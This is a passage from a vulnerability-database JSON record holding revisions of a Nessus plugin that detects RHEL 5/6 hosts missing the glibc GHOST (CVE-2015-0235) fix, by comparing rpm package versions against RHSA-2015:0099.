reference:\"glibc-devel-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"i686\", reference:\"glibc-devel-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"glibc-devel-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"i686\", reference:\"glibc-headers-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"i686\", reference:\"glibc-headers-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"s390x\", reference:\"glibc-headers-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"s390x\", reference:\"glibc-headers-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"x86_64\", reference:\"glibc-headers-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"glibc-headers-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"x86_64\", reference:\"glibc-headers-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", reference:\"glibc-static-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", reference:\"glibc-static-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"i686\", reference:\"glibc-static-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"glibc-static-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"i686\", reference:\"glibc-utils-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"i686\", reference:\"glibc-utils-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"s390x\", reference:\"glibc-utils-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"s390x\", reference:\"glibc-utils-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"x86_64\", reference:\"glibc-utils-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"glibc-utils-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"x86_64\", reference:\"glibc-utils-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"i686\", reference:\"nscd-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"i686\", reference:\"nscd-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"s390x\", reference:\"nscd-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"s390x\", reference:\"nscd-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"x86_64\", reference:\"nscd-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"nscd-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"x86_64\", reference:\"nscd-2.12-1.132.el6_5.5\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"glibc / glibc-common / glibc-debuginfo / glibc-debuginfo-common / etc\");\n }\n}\n", "title": "RHEL 5 / 6 : glibc (RHSA-2015:0099) (GHOST)", "type": "nessus", "viewCount": 2}, "differentElements": ["modified", "sourceData"], "edition": 6, "lastseen": "2018-09-01T23:54:23"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["p-cpe:/a:redhat:enterprise_linux:glibc-static", "cpe:/o:redhat:enterprise_linux:6.5", "p-cpe:/a:redhat:enterprise_linux:glibc-utils", "cpe:/o:redhat:enterprise_linux:5.9", "p-cpe:/a:redhat:enterprise_linux:glibc", "cpe:/o:redhat:enterprise_linux:6.4", "p-cpe:/a:redhat:enterprise_linux:glibc-common", "p-cpe:/a:redhat:enterprise_linux:glibc-devel", "p-cpe:/a:redhat:enterprise_linux:nscd", "cpe:/o:redhat:enterprise_linux:5.6", "cpe:/o:redhat:enterprise_linux:6.2", "p-cpe:/a:redhat:enterprise_linux:glibc-headers", "cpe:/o:redhat:enterprise_linux:6", "p-cpe:/a:redhat:enterprise_linux:glibc-debuginfo", "p-cpe:/a:redhat:enterprise_linux:glibc-debuginfo-common"], "cvelist": ["CVE-2015-0235"], "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "Updated glibc packages that fix one security issue are now available for Red Hat Enterprise Linux 5.6 Long Life, Red Hat Enterprise Linux 5.9 Extended Update Support, Red Hat Enterprise Linux 6.2 Advanced Update Support, and Red Hat Enterprise Linux 6.4 and 6.5 Extended Update Support.\n\nRed Hat Product Security has rated this update as having Critical security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section.\n\nThe glibc packages provide the standard C libraries (libc), POSIX thread libraries (libpthread), standard math libraries (libm), and the Name Server Caching Daemon (nscd) used by multiple programs on the system. Without these libraries, the Linux system cannot function correctly.\n\nA heap-based buffer overflow was found in glibc's\n__nss_hostname_digits_dots() function, which is used by the gethostbyname() and gethostbyname2() glibc function calls. A remote attacker able to make an application call either of these functions could use this flaw to execute arbitrary code with the permissions of the user running the application. (CVE-2015-0235)\n\nRed Hat would like to thank Qualys for reporting this issue.\n\nAll glibc users are advised to upgrade to these updated packages, which contain a backported patch to correct this issue.", "edition": 9, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "hash": "69bed08c62d4f4ca3ff206414ff225bc1c3c9c29351f50506b882db9c5c1b540", "hashmap": [{"hash": "5a30b331c491a149b274795dcb31aa8e", "key": "description"}, {"hash": "841f459c9764bcdcd6d5a1955f15a6d5", "key": "cvelist"}, {"hash": "afe48521f06bd85584068352790299b5", "key": "sourceData"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "2bdabeb49c44761f9565717ab0e38165", "key": "cvss"}, {"hash": "3d8d634cf2d0899c0d90aff4e213fae6", "key": "published"}, {"hash": "d724cd7c7bdb670117d239f0719c8bcd", "key": "references"}, {"hash": "d459846fc4189fab17e65d683fe5fd76", "key": "cpe"}, {"hash": "813366c4a714f890ad158fca7c40bbaf", "key": "pluginID"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "cbab536cd5fdc2c0e0d64b3cdab702d9", "key": "title"}, {"hash": "f4fbc496806d54015060ead78aed54ad", "key": "modified"}, {"hash": "341a141f8365cdd9e626c9fa294e819c", "key": "href"}, {"hash": "b46559ea68ec9a13474c3a7776817cfd", "key": "naslFamily"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=81068", "id": "REDHAT-RHSA-2015-0099.NASL", "lastseen": "2018-12-08T03:48:31", "modified": "2018-12-07T00:00:00", "naslFamily": "Red Hat Local Security Checks", "objectVersion": "1.3", "pluginID": "81068", "published": "2015-01-29T00:00:00", "references": ["https://access.redhat.com/errata/RHSA-2015:0099", "https://access.redhat.com/security/cve/cve-2015-0235"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2015:0099. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(81068);\n script_version(\"1.17\");\n script_cvs_date(\"Date: 2018/12/07 9:46:53\");\n\n script_cve_id(\"CVE-2015-0235\");\n script_xref(name:\"RHSA\", value:\"2015:0099\");\n\n script_name(english:\"RHEL 5 / 6 : glibc (RHSA-2015:0099) (GHOST)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated glibc packages that fix one security issue are now available\nfor Red Hat Enterprise Linux 5.6 Long Life, Red Hat Enterprise Linux\n5.9 Extended Update Support, Red Hat Enterprise Linux 6.2 Advanced\nUpdate Support, and Red Hat Enterprise Linux 6.4 and 6.5 Extended\nUpdate Support.\n\nRed Hat Product Security has rated this update as having Critical\nsecurity impact. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available from the\nCVE link in the References section.\n\nThe glibc packages provide the standard C libraries (libc), POSIX\nthread libraries (libpthread), standard math libraries (libm), and the\nName Server Caching Daemon (nscd) used by multiple programs on the\nsystem. Without these libraries, the Linux system cannot function\ncorrectly.\n\nA heap-based buffer overflow was found in glibc's\n__nss_hostname_digits_dots() function, which is used by the\ngethostbyname() and gethostbyname2() glibc function calls. A remote\nattacker able to make an application call either of these functions\ncould use this flaw to execute arbitrary code with the permissions of\nthe user running the application. (CVE-2015-0235)\n\nRed Hat would like to thank Qualys for reporting this issue.\n\nAll glibc users are advised to upgrade to these updated packages,\nwhich contain a backported patch to correct this issue.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2015:0099\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-0235\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Exim GHOST (glibc gethostbyname) Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-debuginfo-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-static\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nscd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5.6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5.9\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6.2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6.4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6.5\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/01/28\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/01/29\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = eregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^(5\\.6|5\\.9|6)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 5.6 / 5.9 / 6.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2015:0099\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{ sp = get_kb_item(\"Host/RedHat/minor_release\");\n if (isnull(sp)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\n\n flag = 0;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", reference:\"glibc-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i386\", reference:\"glibc-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i686\", reference:\"glibc-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"x86_64\", reference:\"glibc-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i386\", reference:\"glibc-common-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"i386\", reference:\"glibc-common-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"s390x\", reference:\"glibc-common-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"x86_64\", reference:\"glibc-common-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"x86_64\", reference:\"glibc-common-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", reference:\"glibc-debuginfo-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i386\", reference:\"glibc-debuginfo-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i686\", reference:\"glibc-debuginfo-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"x86_64\", reference:\"glibc-debuginfo-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i386\", reference:\"glibc-debuginfo-common-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"i386\", reference:\"glibc-debuginfo-common-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", reference:\"glibc-devel-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i386\", reference:\"glibc-devel-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"x86_64\", reference:\"glibc-devel-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i386\", reference:\"glibc-headers-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"i386\", reference:\"glibc-headers-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"s390x\", reference:\"glibc-headers-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"x86_64\", reference:\"glibc-headers-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"x86_64\", reference:\"glibc-headers-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i386\", reference:\"glibc-utils-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"i386\", reference:\"glibc-utils-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"s390x\", reference:\"glibc-utils-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"x86_64\", reference:\"glibc-utils-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"x86_64\", reference:\"glibc-utils-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i386\", reference:\"nscd-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"i386\", reference:\"nscd-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"s390x\", reference:\"nscd-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"x86_64\", reference:\"nscd-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"x86_64\", reference:\"nscd-2.5-107.el5_9.8\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", sp:\"4\", reference:\"glibc-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", reference:\"glibc-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"i686\", reference:\"glibc-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"glibc-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"i686\", reference:\"glibc-common-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"i686\", reference:\"glibc-common-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"s390x\", reference:\"glibc-common-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"s390x\", reference:\"glibc-common-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"x86_64\", reference:\"glibc-common-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"glibc-common-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"x86_64\", reference:\"glibc-common-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", reference:\"glibc-debuginfo-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", reference:\"glibc-debuginfo-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"i686\", reference:\"glibc-debuginfo-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"glibc-debuginfo-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", reference:\"glibc-debuginfo-common-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", reference:\"glibc-debuginfo-common-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"i686\", reference:\"glibc-debuginfo-common-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"glibc-debuginfo-common-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", reference:\"glibc-devel-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", reference:\"glibc-devel-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"i686\", reference:\"glibc-devel-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"glibc-devel-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"i686\", reference:\"glibc-headers-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"i686\", reference:\"glibc-headers-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"s390x\", reference:\"glibc-headers-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"s390x\", reference:\"glibc-headers-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"x86_64\", reference:\"glibc-headers-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"glibc-headers-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"x86_64\", reference:\"glibc-headers-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", reference:\"glibc-static-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", reference:\"glibc-static-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"i686\", reference:\"glibc-static-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"glibc-static-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"i686\", reference:\"glibc-utils-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"i686\", reference:\"glibc-utils-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"s390x\", reference:\"glibc-utils-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"s390x\", reference:\"glibc-utils-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"x86_64\", reference:\"glibc-utils-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"glibc-utils-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"x86_64\", reference:\"glibc-utils-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"i686\", reference:\"nscd-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"i686\", reference:\"nscd-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"s390x\", reference:\"nscd-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"s390x\", reference:\"nscd-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"x86_64\", reference:\"nscd-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"nscd-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"x86_64\", reference:\"nscd-2.12-1.132.el6_5.5\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"glibc / glibc-common / glibc-debuginfo / glibc-debuginfo-common / etc\");\n }\n}\n", "title": "RHEL 5 / 6 : glibc (RHSA-2015:0099) (GHOST)", "type": "nessus", "viewCount": 2}, "differentElements": ["modified", "sourceData", "title"], "edition": 9, "lastseen": "2018-12-08T03:48:31"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["p-cpe:/a:redhat:enterprise_linux:glibc-static", "cpe:/o:redhat:enterprise_linux:6.5", "p-cpe:/a:redhat:enterprise_linux:glibc-utils", "cpe:/o:redhat:enterprise_linux:5.9", "p-cpe:/a:redhat:enterprise_linux:glibc", "cpe:/o:redhat:enterprise_linux:6.4", "p-cpe:/a:redhat:enterprise_linux:glibc-common", "p-cpe:/a:redhat:enterprise_linux:glibc-devel", "p-cpe:/a:redhat:enterprise_linux:nscd", "cpe:/o:redhat:enterprise_linux:5.6", "cpe:/o:redhat:enterprise_linux:6.2", "p-cpe:/a:redhat:enterprise_linux:glibc-headers", "p-cpe:/a:redhat:enterprise_linux:glibc-debuginfo", "p-cpe:/a:redhat:enterprise_linux:glibc-debuginfo-common"], "cvelist": ["CVE-2015-0235"], "cvss": {"score": 0.0, "vector": "NONE"}, "description": "Updated glibc packages that fix one security issue are now available for Red Hat Enterprise Linux 5.6 Long Life, Red Hat Enterprise Linux 5.9 Extended Update Support, Red Hat Enterprise Linux 6.2 Advanced Update Support, and Red Hat Enterprise Linux 6.4 and 6.5 Extended Update Support.\n\nRed Hat Product Security has rated this update as having Critical security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section.\n\nThe glibc packages provide the standard C libraries (libc), POSIX thread libraries (libpthread), standard math libraries (libm), and the Name Server Caching Daemon (nscd) used by multiple programs on the system. Without these libraries, the Linux system cannot function correctly.\n\nA heap-based buffer overflow was found in glibc's\n__nss_hostname_digits_dots() function, which is used by the gethostbyname() and gethostbyname2() glibc function calls. A remote attacker able to make an application call either of these functions could use this flaw to execute arbitrary code with the permissions of the user running the application. (CVE-2015-0235)\n\nRed Hat would like to thank Qualys for reporting this issue.\n\nAll glibc users are advised to upgrade to these updated packages, which contain a backported patch to correct this issue.", "edition": 5, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "hash": "b3dec0e87da1a779bae4a011b03b94753833e4199498271f8d23cb39a71c3ba4", "hashmap": [{"hash": "5f51513fe342d0d876d5e6133b2e7d91", "key": "sourceData"}, {"hash": "5a30b331c491a149b274795dcb31aa8e", "key": "description"}, {"hash": "7c03779312ffcb90b2c1d0c697a916c4", "key": "modified"}, {"hash": "841f459c9764bcdcd6d5a1955f15a6d5", "key": "cvelist"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "3d8d634cf2d0899c0d90aff4e213fae6", "key": "published"}, {"hash": 